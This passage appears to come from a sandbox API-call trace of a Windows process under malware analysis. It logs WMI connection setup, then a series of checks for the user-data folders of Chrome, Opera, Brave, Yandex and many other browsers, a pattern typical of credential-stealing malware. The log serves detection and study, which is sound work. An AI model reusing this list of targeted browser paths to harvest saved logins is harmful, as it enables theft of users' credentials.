riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x541f0cc | out: ppvObject=0x541f0cc*=0x596ff8) returned 0x0 [0186.404] WbemLocator:IUnknown:QueryInterface (in: This=0x596ff8, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x541f088 | out: ppvObject=0x541f088*=0x0) returned 0x80004002 [0186.404] WbemLocator:IUnknown:QueryInterface (in: This=0x596ff8, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x541ec7c | out: ppvObject=0x541ec7c*=0x0) returned 0x80004002 [0186.404] WbemLocator:IUnknown:AddRef (This=0x596ff8) returned 0x3 [0186.404] WbemLocator:IUnknown:QueryInterface (in: This=0x596ff8, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x541e9dc | out: ppvObject=0x541e9dc*=0x0) returned 0x80004002 [0186.404] WbemLocator:IUnknown:QueryInterface (in: This=0x596ff8, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x541e98c | out: ppvObject=0x541e98c*=0x0) returned 0x80004002 [0186.405] WbemLocator:IUnknown:QueryInterface (in: This=0x596ff8, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x541e998 | out: ppvObject=0x541e998*=0x0) returned 0x80004002 [0186.405] CoGetContextToken (in: pToken=0x541e9f8 | out: pToken=0x541e9f8) returned 0x0 [0186.405] CoGetContextToken (in: pToken=0x541ee00 | out: pToken=0x541ee00) returned 0x0 [0186.405] WbemLocator:IUnknown:QueryInterface (in: This=0x596ff8, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x541ee8c | out: ppvObject=0x541ee8c*=0x0) returned 0x80004002 [0186.405] WbemLocator:IUnknown:Release (This=0x596ff8) returned 0x2 [0186.405] WbemLocator:IUnknown:Release (This=0x596ff8) returned 0x1 [0186.405] CoGetContextToken (in: pToken=0x541f488 | out: pToken=0x541f488) returned 0x0 [0186.405] CoGetContextToken (in: pToken=0x541f3e8 | out: pToken=0x541f3e8) returned 0x0 [0186.405] WbemLocator:IUnknown:QueryInterface (in: This=0x596ff8, riid=0x541f4b8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x541f4b4 | out: ppvObject=0x541f4b4*=0x596ff8) returned 0x0 [0186.405] WbemLocator:IUnknown:AddRef (This=0x596ff8) returned 0x3 [0186.405] WbemLocator:IUnknown:Release (This=0x596ff8) returned 0x2 [0186.405] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594510, puCount=0x541f64c | out: puCount=0x541f64c*=0x2) returned 0x0 [0186.405] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=8, puBuffLength=0x541f648*=0x0, pszText=0x0 | out: puBuffLength=0x541f648*=0xf, pszText=0x0) returned 0x0 [0186.406] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=8, puBuffLength=0x541f648*=0xf, pszText="00000000000000" | out: puBuffLength=0x541f648*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0186.406] CoCreateInstance (in: rclsid=0x65a613b4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x65a61414*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x541f524 | out: ppv=0x541f524*=0x596e38) returned 0x0 [0186.406] WbemLocator:IWbemLocator:ConnectServer (in: This=0x596e38, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x541f5b8 | out: ppNamespace=0x541f5b8*=0x57d910) returned 0x0 [0186.469] WbemLocator:IUnknown:QueryInterface (in: This=0x57d910, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x541f44c | out: ppvObject=0x541f44c*=0x5afd0c) returned 0x0 [0186.469] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x5afd0c, pProxy=0x57d910, pAuthnSvc=0x541f49c, pAuthzSvc=0x541f498, pServerPrincName=0x541f490, pAuthnLevel=0x541f494, pImpLevel=0x541f484, pAuthInfo=0x541f488, pCapabilites=0x541f48c | out: pAuthnSvc=0x541f49c*=0xa, pAuthzSvc=0x541f498*=0x0, pServerPrincName=0x541f490, pAuthnLevel=0x541f494*=0x6, pImpLevel=0x541f484*=0x2, pAuthInfo=0x541f488, pCapabilites=0x541f48c*=0x1) returned 0x0 [0186.469] WbemLocator:IUnknown:Release (This=0x5afd0c) returned 0x1 [0186.469] WbemLocator:IUnknown:QueryInterface (in: This=0x57d910, riid=0x65a61224*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x541f440 | out: ppvObject=0x541f440*=0x5afd30) returned 0x0 [0186.470] WbemLocator:IUnknown:QueryInterface (in: This=0x57d910, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x541f42c | out: ppvObject=0x541f42c*=0x5afd0c) returned 0x0 [0186.470] WbemLocator:IClientSecurity:SetBlanket (This=0x5afd0c, pProxy=0x57d910, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0186.470] WbemLocator:IUnknown:Release (This=0x5afd0c) returned 0x2 [0186.470] WbemLocator:IUnknown:Release (This=0x5afd30) returned 0x1 [0186.470] CoTaskMemFree (pv=0x598e88) [0186.470] WbemLocator:IUnknown:Release (This=0x596e38) returned 0x0 [0186.470] WbemLocator:IUnknown:QueryInterface (in: This=0x57d910, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x541f03c | out: ppvObject=0x541f03c*=0x5afd30) returned 0x0 [0186.470] WbemLocator:IUnknown:QueryInterface (in: This=0x5afd30, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x541eff8 | out: ppvObject=0x541eff8*=0x0) returned 0x80004002 [0186.471] WbemLocator:IUnknown:QueryInterface (in: This=0x5afd30, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x541ee14 | out: ppvObject=0x541ee14*=0x0) returned 0x80004002 [0186.471] WbemLocator:IUnknown:QueryInterface (in: This=0x57d910, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x541ebec | out: ppvObject=0x541ebec*=0x0) returned 0x80004002 [0186.472] WbemLocator:IUnknown:AddRef (This=0x5afd30) returned 0x3 [0186.472] WbemLocator:IUnknown:QueryInterface (in: This=0x5afd30, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x541e94c | out: ppvObject=0x541e94c*=0x0) returned 0x80004002 [0186.472] WbemLocator:IUnknown:QueryInterface (in: This=0x5afd30, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x541e8fc | out: ppvObject=0x541e8fc*=0x0) returned 0x80004002 [0186.472] WbemLocator:IUnknown:QueryInterface (in: This=0x5afd30, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x541e908 | out: ppvObject=0x541e908*=0x5afc8c) returned 0x0 [0186.472] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x5afc8c, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x541e910 | out: pCid=0x541e910*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0186.472] WbemLocator:IUnknown:Release (This=0x5afc8c) returned 0x3 [0186.472] CoGetContextToken (in: pToken=0x541e968 | out: pToken=0x541e968) returned 0x0 [0186.478] CoGetContextToken (in: pToken=0x541ed70 | out: pToken=0x541ed70) returned 0x0 [0186.478] WbemLocator:IUnknown:QueryInterface (in: This=0x5afd30, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x541edfc | out: ppvObject=0x541edfc*=0x5afd14) returned 0x0 [0186.478] WbemLocator:IRpcOptions:Query (in: This=0x5afd14, pPrx=0x5afd30, dwProperty=2, pdwValue=0x541ee08 | out: pdwValue=0x541ee08) returned 0x80004002 [0186.478] WbemLocator:IUnknown:Release (This=0x5afd14) returned 0x3 [0186.478] WbemLocator:IUnknown:Release (This=0x5afd30) returned 0x2 [0186.478] CoGetContextToken (in: pToken=0x541f350 | out: pToken=0x541f350) returned 0x0 [0186.478] CoGetContextToken (in: pToken=0x541f2b0 | out: pToken=0x541f2b0) returned 0x0 [0186.478] WbemLocator:IUnknown:QueryInterface (in: This=0x5afd30, riid=0x541f380*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x541f37c | out: ppvObject=0x541f37c*=0x57d910) returned 0x0 [0186.479] WbemLocator:IUnknown:AddRef (This=0x57d910) returned 0x4 [0186.479] WbemLocator:IUnknown:Release (This=0x57d910) returned 0x3 [0186.479] WbemLocator:IUnknown:Release (This=0x57d910) returned 0x2 [0186.479] SysStringLen (param_1=0x0) returned 0x0 [0186.479] CoUninitialize () Thread: id = 177 os_tid = 0x1294 Thread: id = 178 os_tid = 0x1290 [0188.309] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0188.309] RoInitialize () returned 0x1 [0188.309] RoUninitialize () returned 0x0 [0188.311] ResetEvent (hEvent=0x230) returned 1 [0289.269] QueryContextAttributesW (in: phContext=0x2332bec, ulAttribute=0x1a, pBuffer=0x555f3dc | out: pBuffer=0x555f3dc) returned 0x0 [0289.367] DeleteSecurityContext (phContext=0x2332bec) returned 0x0 [0289.377] shutdown (s=0x604, how=2) returned 0 [0289.434] setsockopt (s=0x604, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0289.434] closesocket (s=0x604) returned 0 Thread: id = 179 os_tid = 0x128c Thread: id = 180 os_tid = 0x1260 [0189.126] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0189.126] RoInitialize () returned 0x1 [0189.126] RoUninitialize () returned 0x0 [0189.171] CoTaskMemAlloc (cb=0x20c) returned 0x520fe10 [0189.172] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x520fe10 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0189.172] CoTaskMemFree (pv=0x520fe10) [0189.172] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x57fd7d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0189.172] CoTaskMemAlloc (cb=0x20c) returned 0x520fe10 [0189.172] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x520fe10 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0189.172] CoTaskMemFree (pv=0x520fe10) [0189.172] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x57fd7d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpFilePart=0x0) returned 0x25 [0189.393] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable", nBufferLength=0x105, lpBuffer=0x57fef10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable", lpFilePart=0x0) returned 0x41 [0189.393] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff3b4) returned 1 [0189.393] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\opera software\\opera stable"), fInfoLevelId=0x0, lpFileInformation=0x57ff430 | out: lpFileInformation=0x57ff430*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.393] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff3b0) returned 1 [0189.393] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data", nBufferLength=0x105, lpBuffer=0x57fef10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data", lpFilePart=0x0) returned 0x3b [0189.393] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff3b4) returned 1 [0189.393] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comodo\\dragon\\user data"), fInfoLevelId=0x0, lpFileInformation=0x57ff430 | out: lpFileInformation=0x57ff430*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.394] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff3b0) returned 1 [0189.394] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data", nBufferLength=0x105, lpBuffer=0x57fef10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data", lpFilePart=0x0) returned 0x3b [0189.394] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff3b4) returned 1 [0189.394] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data"), fInfoLevelId=0x0, lpFileInformation=0x57ff430 | out: lpFileInformation=0x57ff430*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.394] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff3b0) returned 1 [0189.394] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Chrome\\Chrome\\User Data", nBufferLength=0x105, lpBuffer=0x57fef10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Chrome\\Chrome\\User Data", lpFilePart=0x0) returned 0x3e [0189.394] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff3b4) returned 1 [0189.394] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Chrome\\Chrome\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\360chrome\\chrome\\user data"), fInfoLevelId=0x0, lpFileInformation=0x57ff430 | out: lpFileInformation=0x57ff430*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.396] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff3b0) returned 1 [0189.396] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data", nBufferLength=0x105, lpBuffer=0x57fef10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data", lpFilePart=0x0) returned 0x42 [0189.396] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff3b4) returned 1 [0189.396] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\yandex\\yandexbrowser\\user data"), fInfoLevelId=0x0, lpFileInformation=0x57ff430 | out: lpFileInformation=0x57ff430*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.396] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff3b0) returned 1 [0189.397] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data", nBufferLength=0x105, lpBuffer=0x57fef10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data", lpFilePart=0x0) returned 0x36 [0189.397] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff3b4) returned 1 [0189.397] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\chromium\\user data"), fInfoLevelId=0x0, lpFileInformation=0x57ff430 | out: lpFileInformation=0x57ff430*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.397] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff3b0) returned 1 [0189.397] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data", nBufferLength=0x105, lpBuffer=0x57fef10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data", lpFilePart=0x0) returned 0x33 [0189.397] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff3b4) returned 1 [0189.397] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\torch\\user data"), fInfoLevelId=0x0, lpFileInformation=0x57ff430 | out: lpFileInformation=0x57ff430*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.397] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff3b0) returned 1 [0189.397] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", nBufferLength=0x105, lpBuffer=0x57fef10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", lpFilePart=0x0) returned 0x49 [0189.397] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff3b4) returned 1 [0189.397] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\bravesoftware\\brave-browser\\user data"), fInfoLevelId=0x0, lpFileInformation=0x57ff430 | out: lpFileInformation=0x57ff430*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.397] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff3b0) returned 1 [0189.397] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data", nBufferLength=0x105, lpBuffer=0x57fef10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data", lpFilePart=0x0) returned 0x35 [0189.398] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff3b4) returned 1 [0189.398] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\iridium\\user data"), fInfoLevelId=0x0, lpFileInformation=0x57ff430 | out: lpFileInformation=0x57ff430*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.398] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff3b0) returned 1 [0189.398] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data", nBufferLength=0x105, lpBuffer=0x57fef10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data", lpFilePart=0x0) returned 0x44 [0189.398] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff3b4) returned 1 [0189.398] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\maplestudio\\chromeplus\\user data"), fInfoLevelId=0x0, lpFileInformation=0x57ff430 | out: lpFileInformation=0x57ff430*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.398] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff3b0) returned 1 [0189.398] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\7Star\\7Star\\User Data", nBufferLength=0x105, lpBuffer=0x57fef10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\7Star\\7Star\\User Data", lpFilePart=0x0) returned 0x39 [0189.398] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff3b4) returned 1 [0189.398] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\7Star\\7Star\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\7star\\7star\\user data"), fInfoLevelId=0x0, lpFileInformation=0x57ff430 | out: lpFileInformation=0x57ff430*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.398] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff3b0) returned 1 [0189.398] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data", nBufferLength=0x105, lpBuffer=0x57fef10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data", lpFilePart=0x0) returned 0x42 [0189.398] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff3b4) returned 1 [0189.399] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\epic privacy browser\\user data"), fInfoLevelId=0x0, lpFileInformation=0x57ff430 | out: lpFileInformation=0x57ff430*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, 